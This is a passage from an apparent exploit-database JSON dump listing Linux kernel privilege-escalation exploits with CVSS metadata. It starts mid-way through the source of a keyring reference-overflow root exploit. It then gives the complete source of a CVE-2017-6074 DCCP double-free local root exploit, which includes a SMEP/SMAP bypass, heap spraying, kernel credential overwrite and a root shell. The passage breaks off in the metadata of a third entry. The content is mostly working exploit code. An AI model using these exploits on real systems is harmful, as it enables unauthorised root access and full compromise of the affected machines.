*/\nstatic unsigned long get_kernel_sym(char *name)\n{\n FILE *f;\n unsigned long addr;\n char dummy;\n char sname[256];\n int ret;\n\n f = fopen(\"/proc/kallsyms\", \"r\");\n if (f == NULL) {\n fprintf(stdout, \"Unable to obtain symbol listing!\\n\");\n exit(0);\n }\n\n ret = 0;\n while(ret != EOF) {\n ret = fscanf(f, \"%p %c %s\\n\", (void **)&addr, &dummy, sname);\n if (ret == 0) {\n fscanf(f, \"%s\\n\", sname);\n continue;\n }\n if (!strcmp(name, sname)) {\n fprintf(stdout, \"[+] Resolved %s to %p\\n\", name, (void *)addr);\n fclose(f);\n return addr;\n }\n }\n\n fclose(f);\n return 0;\n}\n\nvoid userspace_revoke(void * key) {\n commit_creds(prepare_kernel_cred(0));\n}\n\nint main(int argc, const char *argv[]) {\n const char *keyring_name;\n 
size_t i = 0;\n unsigned long int l = 0x100000000/2;\n key_serial_t serial = -1;\n pid_t pid = -1;\n struct key_type * my_key_type = NULL;\n\n struct {\n long mtype;\n char mtext[STRUCT_LEN];\n } msg = {0x4141414141414141, {0}};\n int msqid;\n\n if (argc != 2) {\n puts(\"usage: ./keys <key_name>\");\n return 1;\n }\n\n printf(\"[+] uid=%d, euid=%d\\n\", getuid(), geteuid());\n commit_creds = (_commit_creds)get_kernel_sym(\"commit_creds\");\n prepare_kernel_cred = (_prepare_kernel_cred)get_kernel_sym(\"prepare_kernel_cred\");\n if(commit_creds == NULL || prepare_kernel_cred == NULL) {\n commit_creds = (_commit_creds)COMMIT_CREDS_ADDR;\n prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CREDS_ADDR;\n if(commit_creds == (_commit_creds)0xffffffff810bb050 || prepare_kernel_cred == (_prepare_kernel_cred)0xffffffff810bb370)\n puts(\"[-] You probably need to change the address of commit_creds and prepare_kernel_cred in source\");\n }\n\n my_key_type = malloc(sizeof(*my_key_type));\n\n my_key_type->revoke = (void*)userspace_revoke;\n memset(msg.mtext, 'A', sizeof(msg.mtext));\n\n // key->uid\n *(int*)(&msg.mtext[56]) = 0x3e8; /* geteuid() */\n //key->perm\n *(int*)(&msg.mtext[64]) = 0x3f3f3f3f;\n\n //key->type\n *(unsigned long *)(&msg.mtext[80]) = (unsigned long)my_key_type;\n\n if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {\n perror(\"msgget\");\n exit(1);\n }\n\n keyring_name = argv[1];\n\n /* Set the new session keyring before we start */\n\n serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name);\n if (serial < 0) {\n perror(\"keyctl\");\n return -1;\n }\n\n if (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL | KEY_GRP_ALL | KEY_OTH_ALL) < 0) {\n perror(\"keyctl\");\n return -1;\n }\n\n\n puts(\"[+] Increfing...\");\n for (i = 1; i < 0xfffffffd; i++) {\n if (i == (0xffffffff - l)) {\n l = l/2;\n sleep(5);\n }\n if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {\n perror(\"[-] keyctl\");\n return -1;\n }\n }\n sleep(5);\n /* 
here we are going to leak the last references to overflow */\n for (i=0; i<5; ++i) {\n if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {\n perror(\"[-] keyctl\");\n return -1;\n }\n }\n\n puts(\"[+] Finished increfing\");\n puts(\"[+] Forking...\");\n /* allocate msg struct in the kernel rewriting the freed keyring object */\n for (i=0; i<64; i++) {\n pid = fork();\n if (pid == -1) {\n perror(\"[-] fork\");\n return -1;\n }\n\n if (pid == 0) {\n sleep(2);\n if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {\n perror(\"[-] msgget\");\n exit(1);\n }\n for (i = 0; i < 64; i++) {\n if (msgsnd(msqid, &msg, sizeof(msg.mtext), 0) == -1) {\n perror(\"[-] msgsnd\");\n exit(1);\n }\n }\n sleep(-1);\n exit(1);\n }\n }\n\n puts(\"[+] Finished forking\");\n sleep(5);\n\n /* call userspace_revoke from kernel */\n puts(\"[+] Caling revoke...\");\n if (keyctl(KEYCTL_REVOKE, KEY_SPEC_SESSION_KEYRING) == -1) {\n perror(\"[+] keyctl_revoke\");\n }\n\n printf(\"uid=%d, euid=%d\\n\", getuid(), geteuid());\n execl(\"/bin/sh\", \"/bin/sh\", NULL);\n\n return 0;\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:28", "description": "\nLinux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-02-26T00:00:00", "type": "exploitpack", "title": "Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6074"], "modified": "2017-02-26T00:00:00", "id": "EXPLOITPACK:84D4B1F42D5DCA9623080EFFD17E58E1", "href": "", "sourceData": "//\n// EDB Note: More information ~ http://seclists.org/oss-sec/2017/q1/471\n//\n// A proof-of-concept local root exploit for CVE-2017-6074.\n// Includes a semireliable SMAP/SMEP bypass.\n// Tested on 4.4.0-62-generic #83-Ubuntu kernel.\n// https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-6074\n//\n// Usage:\n// $ gcc poc.c -o pwn\n// $ ./pwn\n// [.] namespace sandbox setup successfully\n// [.] disabling SMEP & SMAP\n// [.] scheduling 0xffffffff81064550(0x406e0)\n// [.] waiting for the timer to execute\n// [.] done\n// [.] SMEP & SMAP should be off now\n// [.] getting root\n// [.] executing 0x402043\n// [.] done\n// [.] should be root now\n// [.] checking if we got root\n// [+] got r00t ^_^\n// [!] 
don't kill the exploit binary, the kernel will crash\n// # cat /etc/shadow\n// ...\n// daemon:*:17149:0:99999:7:::\n// bin:*:17149:0:99999:7:::\n// sys:*:17149:0:99999:7:::\n// sync:*:17149:0:99999:7:::\n// games:*:17149:0:99999:7:::\n// ...\n//\n// Andrey Konovalov <andreyknvl@gmail.com>\n\n#define _GNU_SOURCE\n\n#include <errno.h>\n#include <fcntl.h>\n#include <stdarg.h>\n#include <stdbool.h>\n#include <stddef.h>\n#include <stdint.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n\n#include <sched.h>\n\n#include <sys/socket.h>\n#include <sys/syscall.h>\n#include <sys/types.h>\n#include <sys/wait.h>\n\n#include <arpa/inet.h>\n#include <linux/if_packet.h>\n#include <netinet/if_ether.h>\n\n#define SMEP_SMAP_BYPASS\t1\n\n// Needed for local root.\n#define COMMIT_CREDS\t\t0xffffffff810a2840L\n#define PREPARE_KERNEL_CRED\t0xffffffff810a2c30L\n#define SHINFO_OFFSET\t\t1728\n\n// Needed for SMEP_SMAP_BYPASS.\n#define NATIVE_WRITE_CR4\t0xffffffff81064550ul\n#define CR4_DESIRED_VALUE\t0x406e0ul\n#define TIMER_OFFSET\t\t(728 + 48 + 104)\n\n#define KMALLOC_PAD 128\n#define KMALLOC_WARM 32\n#define CATCH_FIRST 6\n#define CATCH_AGAIN 16\n#define CATCH_AGAIN_SMALL 64\n\n// Port is incremented on each use.\nstatic int port = 11000;\n\nvoid debug(const char *msg) {\n/*\n\tchar buffer[32];\n\tsnprintf(&buffer[0], sizeof(buffer), \"echo '%s' > /dev/kmsg\\n\", msg);\n\tsystem(buffer);\n*/\n}\n\n// * * * * * * * * * * * * * * Kernel structs * * * * * * * * * * * * * * * *\n\nstruct ubuf_info {\n\tuint64_t callback;\t\t// void (*callback)(struct ubuf_info *, bool)\n\tuint64_t ctx;\t\t\t// void *\n\tuint64_t desc;\t\t\t// unsigned long\n};\n\nstruct skb_shared_info {\n\tuint8_t nr_frags;\t\t// unsigned char\n\tuint8_t tx_flags;\t\t// __u8\n\tuint16_t gso_size;\t\t// unsigned short\n\tuint16_t gso_segs;\t\t// unsigned short\n\tuint16_t gso_type;\t\t// unsigned short\n\tuint64_t frag_list;\t\t// struct sk_buff *\n\tuint64_t hwtstamps;\t\t// struct 
skb_shared_hwtstamps\n\tuint32_t tskey;\t\t\t// u32\n\tuint32_t ip6_frag_id;\t\t// __be32\n\tuint32_t dataref;\t\t// atomic_t\n\tuint64_t destructor_arg;\t// void *\n\tuint8_t frags[16][17];\t\t// skb_frag_t frags[MAX_SKB_FRAGS];\n};\n\nstruct ubuf_info ui;\n\nvoid init_skb_buffer(char* buffer, void *func) {\n\tmemset(&buffer[0], 0, 2048);\n\n\tstruct skb_shared_info *ssi = (struct skb_shared_info *)&buffer[SHINFO_OFFSET];\n\n\tssi->tx_flags = 0xff;\n\tssi->destructor_arg = (uint64_t)&ui;\n\tssi->nr_frags = 0;\n\tssi->frag_list = 0;\n\n\tui.callback = (unsigned long)func;\n}\n\nstruct timer_list {\n\tvoid\t\t*next;\n\tvoid\t\t*prev;\n\tunsigned long\texpires;\n\tvoid\t\t(*function)(unsigned long);\n\tunsigned long\tdata;\n\tunsigned int\tflags;\n\tint\t\tslack;\n};\n\nvoid init_timer_buffer(char* buffer, void *func, unsigned long arg) {\n\tmemset(&buffer[0], 0, 2048);\n\n\tstruct timer_list* timer = (struct timer_list *)&buffer[TIMER_OFFSET];\n\n\ttimer->next = 0;\n\ttimer->prev = 0;\n\ttimer->expires = 4294943360;\n\ttimer->function = func;\n\ttimer->data = arg;\n\ttimer->flags = 1;\n\ttimer->slack = -1;\n}\n\n// * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * *\n\nstruct dccp_handle {\n\tstruct sockaddr_in6 sa;\n\tint s1;\n\tint s2;\n};\n\nvoid dccp_init(struct dccp_handle *handle, int port) {\n\thandle->sa.sin6_family = AF_INET6;\n\thandle->sa.sin6_port = htons(port);\n\tinet_pton(AF_INET6, \"::1\", &handle->sa.sin6_addr);\n\thandle->sa.sin6_flowinfo = 0;\n\thandle->sa.sin6_scope_id = 0;\n\n\thandle->s1 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP);\n\tif (handle->s1 == -1) {\n\t\tperror(\"socket(SOCK_DCCP)\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tint rv = bind(handle->s1, &handle->sa, sizeof(handle->sa));\n\tif (rv != 0) {\n\t\tperror(\"bind()\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\trv = listen(handle->s1, 0x9);\n\tif (rv != 0) {\n\t\tperror(\"listen()\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tint optval = 8;\n\trv = setsockopt(handle->s1, 
IPPROTO_IPV6, IPV6_RECVPKTINFO,\n\t\t\t&optval, sizeof(optval));\n\tif (rv != 0) {\n\t\tperror(\"setsockopt(IPV6_RECVPKTINFO)\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\thandle->s2 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP);\n\tif (handle->s1 == -1) {\n\t\tperror(\"socket(SOCK_DCCP)\");\n\t\texit(EXIT_FAILURE);\n\t}\n}\n\nvoid dccp_kmalloc_kfree(struct dccp_handle *handle) {\n\tint rv = connect(handle->s2, &handle->sa, sizeof(handle->sa));\n\tif (rv != 0) {\n\t\tperror(\"connect(SOCK_DCCP)\");\n\t\texit(EXIT_FAILURE);\n\t}\n}\n\nvoid dccp_kfree_again(struct dccp_handle *handle) {\n\tint rv = shutdown(handle->s1, SHUT_RDWR);\n\tif (rv != 0) {\n\t\tperror(\"shutdown(SOCK_DCCP)\");\n\t\texit(EXIT_FAILURE);\n\t}\n}\n\nvoid dccp_destroy(struct dccp_handle *handle) {\n\tclose(handle->s1);\n\tclose(handle->s2);\n}\n\n// * * * * * * * * * * * * * * Heap spraying * * * * * * * * * * * * * * * * *\n\nstruct udp_fifo_handle {\n\tint fds[2];\n};\n\nvoid udp_fifo_init(struct udp_fifo_handle* handle) {\n\tint rv = socketpair(AF_LOCAL, SOCK_DGRAM, 0, handle->fds);\n\tif (rv != 0) {\n\t\tperror(\"socketpair()\");\n\t\texit(EXIT_FAILURE);\n\t}\n}\n\nvoid udp_fifo_destroy(struct udp_fifo_handle* handle) {\n\tclose(handle->fds[0]);\n\tclose(handle->fds[1]);\n}\n\nvoid udp_fifo_kmalloc(struct udp_fifo_handle* handle, char *buffer) {\n\tint rv = send(handle->fds[0], buffer, 1536, 0);\n\tif (rv != 1536) {\n\t\tperror(\"send()\");\n\t\texit(EXIT_FAILURE);\n\t}\n}\n\nvoid udp_fifo_kmalloc_small(struct udp_fifo_handle* handle) {\n\tchar buffer[128];\n\tint rv = send(handle->fds[0], &buffer[0], 128, 0);\n\tif (rv != 128) {\n\t\tperror(\"send()\");\n\t\texit(EXIT_FAILURE);\n\t}\n}\n\nvoid udp_fifo_kfree(struct udp_fifo_handle* handle) {\n \tchar buffer[2048];\n\tint rv = recv(handle->fds[1], &buffer[0], 1536, 0);\n\tif (rv != 1536) {\n\t\tperror(\"recv()\");\n\t\texit(EXIT_FAILURE);\n\t}\n}\n\nint timer_kmalloc() {\n\tint s = socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP));\n\tif (s == -1) 
{\n\t\tperror(\"socket(SOCK_DGRAM)\");\n\t\texit(EXIT_FAILURE);\n\t}\n\treturn s;\n}\n\n#define CONF_RING_FRAMES 1\nvoid timer_schedule(int handle, int timeout) {\n\tint optval = TPACKET_V3;\n\tint rv = setsockopt(handle, SOL_PACKET, PACKET_VERSION,\n\t\t\t&optval, sizeof(optval));\n\tif (rv != 0) {\n\t\tperror(\"setsockopt(PACKET_VERSION)\");\n\t\texit(EXIT_FAILURE);\n\t}\n\tstruct tpacket_req3 tp;\n\tmemset(&tp, 0, sizeof(tp));\n\ttp.tp_block_size = CONF_RING_FRAMES * getpagesize();\n\ttp.tp_block_nr = 1;\n\ttp.tp_frame_size = getpagesize();\n\ttp.tp_frame_nr = CONF_RING_FRAMES;\n\ttp.tp_retire_blk_tov = timeout;\n\trv = setsockopt(handle, SOL_PACKET, PACKET_RX_RING,\n\t\t\t(void *)&tp, sizeof(tp));\n\tif (rv != 0) {\n\t\tperror(\"setsockopt(PACKET_RX_RING)\");\n\t\texit(EXIT_FAILURE);\n\t}\n}\n\nvoid socket_sendmmsg(int sock, char *buffer) {\n\tstruct mmsghdr msg[1];\n\n\tmsg[0].msg_hdr.msg_iovlen = 0;\n\n\t// Buffer to kmalloc.\n\tmsg[0].msg_hdr.msg_control = &buffer[0];\n\tmsg[0].msg_hdr.msg_controllen = 2048;\n\n\t// Make sendmmsg exit easy with EINVAL.\n\tmsg[0].msg_hdr.msg_name = \"root\";\n\tmsg[0].msg_hdr.msg_namelen = 1;\n\n\tint rv = syscall(__NR_sendmmsg, sock, msg, 1, 0);\n\tif (rv == -1 && errno != EINVAL) {\n\t\tperror(\"[-] sendmmsg()\");\n\t\texit(EXIT_FAILURE);\n\t}\n}\n\nvoid sendmmsg_kmalloc_kfree(int port, char *buffer) {\n\tint sock[2];\n\n\tint rv = socketpair(AF_LOCAL, SOCK_DGRAM, 0, sock);\n\tif (rv != 0) {\n\t\tperror(\"socketpair()\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tsocket_sendmmsg(sock[0], buffer);\n\n\tclose(sock[0]);\n}\n\n// * * * * * * * * * * * * * * Heap warming * * * * * * * * * * * * * * * * *\n\nvoid dccp_connect_pad(struct dccp_handle *handle, int port) {\n\thandle->sa.sin6_family = AF_INET6;\n\thandle->sa.sin6_port = htons(port);\n\tinet_pton(AF_INET6, \"::1\", &handle->sa.sin6_addr);\n\thandle->sa.sin6_flowinfo = 0;\n\thandle->sa.sin6_scope_id = 0;\n\n\thandle->s1 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP);\n\tif 
(handle->s1 == -1) {\n\t\tperror(\"socket(SOCK_DCCP)\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tint rv = bind(handle->s1, &handle->sa, sizeof(handle->sa));\n\tif (rv != 0) {\n\t\tperror(\"bind()\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\trv = listen(handle->s1, 0x9);\n\tif (rv != 0) {\n\t\tperror(\"listen()\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\thandle->s2 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP);\n\tif (handle->s1 == -1) {\n\t\tperror(\"socket(SOCK_DCCP)\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\trv = connect(handle->s2, &handle->sa, sizeof(handle->sa));\n\tif (rv != 0) {\n\t\tperror(\"connect(SOCK_DCCP)\");\n\t\texit(EXIT_FAILURE);\n\t}\n}\n\nvoid dccp_kmalloc_pad() {\n\tint i;\n\tstruct dccp_handle handle;\n\tfor (i = 0; i < 4; i++) {\n\t\tdccp_connect_pad(&handle, port++);\n\t}\n}\n\nvoid timer_kmalloc_pad() {\n\tint i;\n\tfor (i = 0; i < 4; i++) {\n\t\tsocket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP));\n\t}\n}\n\nvoid udp_kmalloc_pad() {\n\tint i, j;\n\tchar dummy[2048];\n\tstruct udp_fifo_handle uh[16];\n\tfor (i = 0; i < KMALLOC_PAD / 16; i++) {\n\t\tudp_fifo_init(&uh[i]);\n\t\tfor (j = 0; j < 16; j++)\n\t\t\tudp_fifo_kmalloc(&uh[i], &dummy[0]);\n\t}\n}\n\nvoid kmalloc_pad() {\n\tdebug(\"dccp kmalloc pad\");\n\tdccp_kmalloc_pad();\n\tdebug(\"timer kmalloc pad\");\n\ttimer_kmalloc_pad();\n\tdebug(\"udp kmalloc pad\");\n\tudp_kmalloc_pad();\n}\n\nvoid udp_kmalloc_warm() {\n\tint i, j;\n\tchar dummy[2048];\n\tstruct udp_fifo_handle uh[16];\n\tfor (i = 0; i < KMALLOC_WARM / 16; i++) {\n\t\tudp_fifo_init(&uh[i]);\n\t\tfor (j = 0; j < 16; j++)\n\t\t\tudp_fifo_kmalloc(&uh[i], &dummy[0]);\n\t}\n\tfor (i = 0; i < KMALLOC_WARM / 16; i++) {\n\t\tfor (j = 0; j < 16; j++)\n\t\t\tudp_fifo_kfree(&uh[i]);\n\t}\n}\n\nvoid kmalloc_warm() {\n\tudp_kmalloc_warm();\n}\n\n// * * * * * * * * * * * * * Disabling SMEP/SMAP * * * * * * * * * * * * * * *\n\n// Executes func(arg) from interrupt context multiple times.\nvoid kernel_exec_irq(void *func, unsigned long arg) {\n\tint i;\n\tstruct 
dccp_handle dh;\n\tstruct udp_fifo_handle uh1, uh2, uh3, uh4;\n\tchar dummy[2048];\n\tchar buffer[2048];\n\n\tprintf(\"[.] scheduling %p(%p)\\n\", func, (void *)arg);\n\n\tmemset(&dummy[0], 0xc3, 2048);\n\tinit_timer_buffer(&buffer[0], func, arg);\n\n\tudp_fifo_init(&uh1);\n\tudp_fifo_init(&uh2);\n\tudp_fifo_init(&uh3);\n\tudp_fifo_init(&uh4);\n\n\tdebug(\"kmalloc pad\");\n\tkmalloc_pad();\n\n\tdebug(\"kmalloc warm\");\n\tkmalloc_warm();\n\n\tdebug(\"dccp init\");\n\tdccp_init(&dh, port++);\n\n\tdebug(\"dccp kmalloc kfree\");\n\tdccp_kmalloc_kfree(&dh);\n\n\tdebug(\"catch 1\");\n\tfor (i = 0; i < CATCH_FIRST; i++)\n\t\tudp_fifo_kmalloc(&uh1, &dummy[0]);\n\n\tdebug(\"dccp kfree again\");\n\tdccp_kfree_again(&dh);\n\n\tdebug(\"catch 2\");\n\tfor (i = 0; i < CATCH_FIRST; i++)\n\t\tudp_fifo_kmalloc(&uh2, &dummy[0]);\n\n\tint timers[CATCH_FIRST];\n\tdebug(\"catch 1 -> timer\");\n\tfor (i = 0; i < CATCH_FIRST; i++) {\n\t\tudp_fifo_kfree(&uh1);\n\t\ttimers[i] = timer_kmalloc();\n\t}\n\n\tdebug(\"catch 1 small\");\n\tfor (i = 0; i < CATCH_AGAIN_SMALL; i++)\n\t\tudp_fifo_kmalloc_small(&uh4);\n\n\tdebug(\"schedule timers\");\n\tfor (i = 0; i < CATCH_FIRST; i++)\n\t\ttimer_schedule(timers[i], 500);\n\n\tdebug(\"catch 2 -> overwrite timers\");\n\tfor (i = 0; i < CATCH_FIRST; i++) {\n\t\tudp_fifo_kfree(&uh2);\n\t\tudp_fifo_kmalloc(&uh3, &buffer[0]);\n\t}\n\n\tdebug(\"catch 2 small\");\n\tfor (i = 0; i < CATCH_AGAIN_SMALL; i++)\n\t\tudp_fifo_kmalloc_small(&uh4);\n\n\tprintf(\"[.] waiting for the timer to execute\\n\");\n\n\tdebug(\"wait\");\n\tsleep(1);\n\n\tprintf(\"[.] done\\n\");\n}\n\nvoid disable_smep_smap() {\n\tprintf(\"[.] disabling SMEP & SMAP\\n\");\n\tkernel_exec_irq((void *)NATIVE_WRITE_CR4, CR4_DESIRED_VALUE);\n\tprintf(\"[.] 
SMEP & SMAP should be off now\\n\");\n}\n\n// * * * * * * * * * * * * * * * Getting root * * * * * * * * * * * * * * * * *\n\n// Executes func() from process context.\nvoid kernel_exec(void *func) {\n\tint i;\n\tstruct dccp_handle dh;\n\tstruct udp_fifo_handle uh1, uh2, uh3;\n\tchar dummy[2048];\n\tchar buffer[2048];\n\n\tprintf(\"[.] executing %p\\n\", func);\n\n\tmemset(&dummy[0], 0, 2048);\n\tinit_skb_buffer(&buffer[0], func);\n\n\tudp_fifo_init(&uh1);\n\tudp_fifo_init(&uh2);\n\tudp_fifo_init(&uh3);\n\n\tdebug(\"kmalloc pad\");\n\tkmalloc_pad();\n\n\tdebug(\"kmalloc warm\");\n\tkmalloc_warm();\n\n\tdebug(\"dccp init\");\n\tdccp_init(&dh, port++);\n\n\tdebug(\"dccp kmalloc kfree\");\n\tdccp_kmalloc_kfree(&dh);\n\n\tdebug(\"catch 1\");\n\tfor (i = 0; i < CATCH_FIRST; i++)\n\t\tudp_fifo_kmalloc(&uh1, &dummy[0]);\n\n\tdebug(\"dccp kfree again:\");\n\tdccp_kfree_again(&dh);\n\n\tdebug(\"catch 2\");\n\tfor (i = 0; i < CATCH_FIRST; i++)\n\t\tudp_fifo_kmalloc(&uh2, &dummy[0]);\n\n\tdebug(\"catch 1 -> overwrite\");\n\tfor (i = 0; i < CATCH_FIRST; i++) {\n\t\tudp_fifo_kfree(&uh1);\n\t\tsendmmsg_kmalloc_kfree(port++, &buffer[0]);\n\t}\n\tdebug(\"catch 2 -> free & trigger\");\n\tfor (i = 0; i < CATCH_FIRST; i++)\n\t\tudp_fifo_kfree(&uh2);\n\n\tdebug(\"catch 1 & 2\");\n\tfor (i = 0; i < CATCH_AGAIN; i++)\n\t\tudp_fifo_kmalloc(&uh3, &dummy[0]);\n\n\tprintf(\"[.] done\\n\");\n}\n\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\n\n_commit_creds commit_creds = (_commit_creds)COMMIT_CREDS;\n_prepare_kernel_cred prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CRED;\n\nvoid get_root_payload(void) {\n\tcommit_creds(prepare_kernel_cred(0));\n}\n\nvoid get_root() {\n\tprintf(\"[.] getting root\\n\");\n\tkernel_exec(&get_root_payload);\n\tprintf(\"[.] 
should be root now\\n\");\n}\n\n// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *\n\nvoid exec_shell() {\n\tchar *shell = \"/bin/bash\";\n\tchar *args[] = {shell, \"-i\", NULL};\n\texecve(shell, args, NULL);\n}\n\nvoid fork_shell() {\n\tpid_t rv;\n\n\trv = fork();\n\tif (rv == -1) {\n\t\tperror(\"fork()\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tif (rv == 0) {\n\t\texec_shell();\n\t}\n}\n\nbool is_root() {\n\t// We can't simple check uid, since we're running inside a namespace\n\t// with uid set to 0. Try opening /etc/shadow instead.\n\tint fd = open(\"/etc/shadow\", O_RDONLY);\n\tif (fd == -1)\n\t\treturn false;\n\tclose(fd);\n\treturn true;\n}\n\nvoid check_root() {\n\tprintf(\"[.] checking if we got root\\n\");\n\n\tif (!is_root()) {\n\t\tprintf(\"[-] something went wrong =(\\n\");\n\t\tprintf(\"[!] don't kill the exploit binary, the kernel will crash\\n\");\n\t\treturn;\n\t}\n\n\tprintf(\"[+] got r00t ^_^\\n\");\n\tprintf(\"[!] don't kill the exploit binary, the kernel will crash\\n\");\n\n\t// Fork and exec instead of just doing the exec to avoid freeing\n\t// skbuffs and prevent crashes due to a allocator corruption.\n\tfork_shell();\n}\n\nstatic bool write_file(const char* file, const char* what, ...)\n{\n\tchar buf[1024];\n\tva_list args;\n\tva_start(args, what);\n\tvsnprintf(buf, sizeof(buf), what, args);\n\tva_end(args);\n\tbuf[sizeof(buf) - 1] = 0;\n\tint len = strlen(buf);\n\n\tint fd = open(file, O_WRONLY | O_CLOEXEC);\n\tif (fd == -1)\n\t\treturn false;\n\tif (write(fd, buf, len) != len) {\n\t\tclose(fd);\n\t\treturn false;\n\t}\n\tclose(fd);\n\treturn true;\n}\n\nvoid setup_sandbox() {\n\tint real_uid = getuid();\n\tint real_gid = getgid();\n\n if (unshare(CLONE_NEWUSER) != 0) {\n\t\tperror(\"unshare(CLONE_NEWUSER)\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n if (unshare(CLONE_NEWNET) != 0) {\n\t\tperror(\"unshare(CLONE_NEWUSER)\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tif (!write_file(\"/proc/self/setgroups\", \"deny\")) 
{\n\t\tperror(\"write_file(/proc/self/set_groups)\");\n\t\texit(EXIT_FAILURE);\n\t}\n\tif (!write_file(\"/proc/self/uid_map\", \"0 %d 1\\n\", real_uid)){\n\t\tperror(\"write_file(/proc/self/uid_map)\");\n\t\texit(EXIT_FAILURE);\n\t}\n\tif (!write_file(\"/proc/self/gid_map\", \"0 %d 1\\n\", real_gid)) {\n\t\tperror(\"write_file(/proc/self/gid_map)\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tcpu_set_t my_set;\n\tCPU_ZERO(&my_set);\n\tCPU_SET(0, &my_set);\n\tif (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) {\n\t\tperror(\"sched_setaffinity()\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tif (system(\"/sbin/ifconfig lo up\") != 0) {\n\t\tperror(\"system(/sbin/ifconfig lo up)\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tprintf(\"[.] namespace sandbox setup successfully\\n\");\n}\n\nint main() {\n\tsetup_sandbox();\n\n#if SMEP_SMAP_BYPASS\n\tdisable_smep_smap();\n#endif\n\n\tget_root();\n\n\tcheck_root();\n\n\twhile (true) {\n\t\tsleep(100);\n\t}\n\n\treturn 0;\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:28", "description": "\nLinux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free (PoC)", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-02-26T00:00:00", "type": "exploitpack", "title": "Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free (PoC)", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": 
